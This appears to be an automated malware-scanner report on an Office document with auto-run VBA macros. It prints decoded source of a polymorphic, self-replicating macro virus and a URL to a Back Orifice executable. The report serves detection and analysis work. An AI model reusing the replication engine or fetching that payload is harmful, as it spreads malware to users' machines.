MALICIOUS
362
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including Document_Open and Workbook_Open, which are designed to execute automatically. Critical heuristics indicate the use of Shell() and CreateObject(), suggesting the execution of arbitrary code. The embedded URL 'http://www.bo2k.com/warez/bo2k_1.0.exe' likely points to a secondary payload. ClamAV detections further confirm the malicious nature of the file and its extracted artifact.
Heuristics 8
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.nephilim.com/ In document text (OLE body)
- http://www.bo2k.com/warez/bo2k_1.0.exeIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 72056 bytes |
SHA-256: c24d9609751039f5a8652adda3b229fb0e60f9b26e5e1cf1291fa4dd6ba79520 |
|||
|
Detection
ClamAV:
Win.Trojan.W-420
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Nephalim v0.93 -- Pre-release version.
'
' Known issues in this release:
' -Instability on Excel platform
'
Private Sub fDeleteFile(sFileName As String)
On Error Resume Next
If Dir(sFileName) <> "" Then
SetAttr sFileName, 0
Kill sFileName
End If
End Sub
Private Function CreateKey()
On Error Resume Next
Dim iTemp As Integer, sKey As String
sKey = ""
For iTemp = 1 To Int((30 * Rnd) + 6): sKey = sKey + Chr(Int((122 - 65) * Rnd) + 65): Next iTemp
CreateKey = sKey
End Function
Private Function fExposedEngine(sTargetApp As String, sKey As String, iLineCount As Integer)
On Error Resume Next
Dim var(20) As String, eol(20) As String, bond(20) As String, proc_declare(20) As String
Dim sEngine1 As String, sEngine2 As String, sEngine3 As String
Randomize
sTemp = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
For iTemp = 1 To 20
poz = Int(Rnd * Len(sTemp)) + 1
var(iTemp) = Mid(sTemp, poz, 1)
sTemp = Left(sTemp, poz - 1) + Right(sTemp, Len(sTemp) - poz)
Select Case Int((4 * Rnd) + 1)
Case 1: bond(iTemp) = ": "
eol(iTemp) = vbLf & vbLf & vbLf
proc_declare(iTemp) = ""
Case 2: bond(iTemp) = vbLf
eol(iTemp) = vbLf
proc_declare(iTemp) = "Private "
Case 3: bond(iTemp) = vbLf & vbLf
eol(iTemp) = vbLf & vbLf
proc_declare(iTemp) = "Public "
Case 4: bond(iTemp) = ": Rem " & CreateKey & vbLf
eol(iTemp) = vbLf & vbLf & vbLf
proc_declare(iTemp) = ""
End Select
Next iTemp
iSplitNumber1 = 130
iSplitNumber1A = Int(Rnd * iSplitNumber1)
iSplitNumber1B = iSplitNumber1 - iSplitNumber1A
iSplitNumber2 = 32
iSplitNumber2A = Int(Rnd * iSplitNumber2)
iSplitNumber2B = iSplitNumber2 - iSplitNumber2A
iSplitNumber3 = iLineCount
iSplitNumber3A = Int(Rnd * iSplitNumber3)
iSplitNumber3B = iSplitNumber3 - iSplitNumber3A
sObject = var(9) & ".VBProject.VBComponents.Item(" & var(16) & ").CodeModule."
iTemp = Int(Rnd * Len(sObject)) + 1
poz = InStr(iTemp, sObject, ".")
sOne = Left(sObject, poz - 1)
sTwo = Right(sObject, Len(sObject) - poz + 1)
sSplitObject1A = "set " & var(10) & " = " & sOne
sSplitObject1B = var(10) & sTwo
sObject = "VBProject.VBComponents.Item(1).CodeModule."
iTemp = Int(Rnd * Len(sObject)) + 1
poz = InStr(iTemp, sObject, ".")
sOne = Left(sObject, poz - 1)
sTwo = Right(sObject, Len(sObject) - poz + 1)
sSplitObject2A = "set " & var(13) & " = " & sOne
sSplitObject2B = var(13) & sTwo
sEngine1 = _
"Private Sub " & var(14) & "()" & bond(1) & _
"On Error Resume Next" & bond(2)
Select Case sTargetApp
Case "Excel": sEngine1 = sEngine1 & _
"Dim " & var(9) & " As Excel.Workbook" & bond(3) & _
"Set " & var(9) & " = Excel.Workbooks.Add" & bond(4) & _
var(16) & " = 4" & bond(5)
Case "Word": sEngine1 = sEngine1 & _
"Dim " & var(9) & " As Word.Document" & bond(3) & _
"Set " & var(9) & " = Word.Documents.Add" & bond(4) & _
var(16) & " = 1" & bond(5)
End Select
sEngine1 = sEngine1 & _
sSplitObject1A & bond(6) & _
sSplitObject2A & bond(7) & _
var(11) & " = (" & iSplitNumber1A & "+" & iSplitNumber1B & ")" & bond(8) & _
var(12) & " = (" & iSplitNumber2A & "+" & iSplitNumber2B & ")" & bond(9) & _
"For " & var(1) & " = 1 To " & iSplitNumber3A & "+" & iSplitNumber3B & eol(10) & _
var(5) & " = " & sSplitObject2B & "lines(" & var(1) & ", 1)" & bond(11) & _
var(5) & " = right(" & var(5) & ",len(" & var(5) & ")-1)" & bond(12) & _
var(4) & " = """"" & bond(13) & _
var(3) & " = 0" & bond(14) & _
"For " & var(2) & " = 1 To Len(" & var(5) & ")" & eol(15) & _
var(3) & " = " & var(3) & " + 1" & eol(16) & _
"If " & var(3) & " > " & Len(sKey) & "Then " & var(3) & " = 1" & eol(1) & _
var(6) & " = Asc(Mid(" & var(5) & ", " & var(2) & ", 1))" & eol(17) & _
"If " & var(6) & " >= " & var(12) & " And " & var(6) & " <= " & var(11) & " Then" & eol(18)
sEngine2 = _
var(8) & " = Asc(Mid(""" & sKey & """, " & var(3) & ", 1))" & bond(19)
sEngine3 = _
"If " & var(8) & " >
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.